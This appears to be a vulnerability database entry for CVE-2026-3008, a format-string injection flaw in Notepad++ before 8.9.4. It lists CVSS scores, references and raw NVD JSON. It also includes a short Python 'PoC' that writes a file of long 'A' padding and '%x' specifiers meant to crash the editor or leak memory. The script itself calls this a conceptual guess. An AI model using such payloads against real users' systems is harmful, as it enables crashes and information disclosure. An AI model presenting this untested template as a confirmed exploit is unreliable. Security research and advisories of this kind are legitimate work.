CVE-2026-3008

Description

Successful exploitation of the string injection vulnerability could allow an attacker to obtain memory address information or crash the application.

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Notepad++ < 8.9.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-3008 (Notepad++ String Injection)
# This script generates a file with a potentially malicious string pattern.
# Opening this file in a vulnerable version of Notepad++ may trigger a crash or information leak.

import sys

def generate_poc_file(filename):
    # Based on the vulnerability description, a long string or specific format
    # string might be needed. This is a conceptual example.
    # Adjust the payload based on specific technical analysis from the referenced GitHub links.
    
    # Example payload: A long string of 'A's followed by a format specifier
    # to test for memory read/crash.
    payload = "A" * 10000 + "%x" * 50
    
    try:
        with open(filename, "w", encoding="utf-8", errors="ignore") as f:
            f.write(payload)
        print(f"[+] PoC file generated successfully: {filename}")
        print("[*] Open this file in Notepad++ to test for the vulnerability.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")

if __name__ == "__main__":
    output_file = "cve_2026_3008_poc.txt"
    generate_poc_file(output_file)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3008
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3008
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3008/
[4] VulDB https://vuldb.com/cve/CVE-2026-3008
[5] https://community.notepad-plus-plus.org/topic/27500/notepad-v8-9-4-release-candidate
[6] https://github.com/llgsjsm/cve-2026-3008
[7] https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17960
[8] https://llgsjsm.github.io/cve-2026-3008/
[9] https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-044/
[10] https://github.com/llgsjsm/cve-2026-3008

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3008", "sourceIdentifier": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "published": "2026-04-27T07:16:03.597", "lastModified": "2026-04-27T18:57:20.293", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Successful exploitation of the\nstring injection vulnerability could allow an attacker to obtain memory address\ninformation or crash the application."}], "metrics": {"cvssMetricV31": [{"source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-134"}]}], "references": [{"url": "https://community.notepad-plus-plus.org/topic/27500/notepad-v8-9-4-release-candidate", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/llgsjsm/cve-2026-3008", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17960", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://llgsjsm.github.io/cve-2026-3008/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-044/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4"}, {"url": "https://github.com/llgsjsm/cve-2026-3008", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}